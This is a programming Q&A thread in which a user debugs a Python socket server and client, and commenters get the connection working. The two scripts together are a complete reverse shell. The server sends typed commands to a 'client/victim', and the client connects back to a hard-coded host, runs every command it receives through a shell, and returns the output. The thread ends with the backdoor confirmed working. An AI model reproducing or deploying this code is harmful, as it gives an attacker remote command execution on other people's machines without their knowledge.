# Cannot make the client.py file bind to the server.py file

Tags: python, sockets

I'm fiddling around with socket programming and can't seem to get my server.py file to work. 
 My first step is execute the following server.py file (which works). I then execute the client.py and the following error pops up:

```
Traceback (most recent call last):
  File "client.py", line 10, in <module>
    s.connect((host, port))
PermissionError: [Errno 13] Permission denied
```

I've tried running the client.py file as an administrator and the port number is too high to be privileged. What am I missing here?

Server.py File:

```
import socket
import sys


# Create a Socket ( connect two computers)
def create_socket():
    try:
        global host
        global port
        global s
        host = ""
        port = 9999
        s = socket.socket()

    except socket.error as msg:
        print("Socket creation error: " + str(msg))


# Binding the socket and listening for connections
def bind_socket():
    try:
        global host
        global port
        global s
        print("Binding the Port: " + str(port))

        s.bind((host, port))
        s.listen(5)

    except socket.error as msg:
        print("Socket Binding error" + str(msg) + "\n" + "Retrying...")
        bind_socket()


# Establish connection with a client (socket must be listening)

def socket_accept():
    conn, address = s.accept()
    print("Connection has been established! |" + " IP " + address[0] + " | Port" + str(address[1]))
    send_commands(conn)
    conn.close()

# Send commands to client/victim or a friend
def send_commands(conn):
    while True:
        cmd = input()
        if cmd == 'quit':
            conn.close()
            s.close()
            sys.exit()
        if len(str.encode(cmd)) > 0:
            conn.send(str.encode(cmd))
            client_response = str(conn.recv(1024),"utf-8")
            print(client_response, end="")


def main():
    create_socket()
    bind_socket()
    socket_accept()


main()
```

Client.py file:

````
import socket
import os
import subprocess

s = socket.socket()
host = '192.168.1.255'
port = 9999

s.connect((host, port))

while True:
    data = s.recv(1024)
    if data[:2].decode("utf-8") == 'cd':
        os.chdir(data[3:].decode("utf-8"))

    if len(data) > 0:
        cmd = subprocess.Popen(data[:].decode("utf-8"),shell=True, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
        output_byte = cmd.stdout.read() + cmd.stderr.read()
        output_str = str(output_byte,"utf-8")
        currentWD = os.getcwd() + "> "
        s.send(str.encode(output_str + currentWD))

        print(output_str)```
````

Comment: some ports can be blocked by system - try `8000` or `5000` which are usually used in examples.

Comment: is your computer IP really with `.255` ? Usually it is use as broadcasting IP to send message to all computers in local network. What if you use `'localhost'` (if you run client and server on the same computer)

Comment: Thank you! That worked! I changed the IP address and used 8000